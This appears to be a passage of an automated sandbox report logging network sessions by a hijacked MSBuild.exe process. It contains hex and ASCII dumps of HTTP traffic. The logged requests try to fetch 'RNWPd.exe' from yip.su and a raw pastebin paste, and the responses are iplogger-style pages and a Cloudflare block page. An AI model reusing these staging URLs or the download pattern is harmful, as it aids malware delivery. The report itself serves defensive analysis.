2024-09-16 19:22:34 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49768	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:34 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:35 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:34 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFPp9u0IBPws5wMYF00Jc7ZnBUAE36dUEnQ227tkrLaUbDOoYoilku0ckhZyxWMSGrEZEh3b7ftBCIedmbSd8sLe%2BxcRZt2gPJQ%2F2wwFS5kScEj%2BSd6tQ9k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4339e01b6f7c82-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:35 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:35 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:22:35 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:22:35 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:22:35 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:22:35 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:22:35 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49769	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:39 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:40 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433a001cc21927-EWR
2024-09-16 19:22:40 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:40 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49770	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:40 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:40 UTC	904	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:40 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:40 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKnPZRLaP7FHsYiNZPvMYRI3Hq48wrYpTi1vrQqbaiEnHLV%2FOh4ThsvpHamLp1Ini%2B4T3DXKd96O02VWbFEuAQkUcJoj%2FZ2u9M%2B36XcWwp%2B4f0S3z07AQaY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433a042e1d41ac-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:40 UTC	465	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
2024-09-16 19:22:40 UTC	1369	IN	Data Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 Data Ascii: 31px;margin:auto}.logo 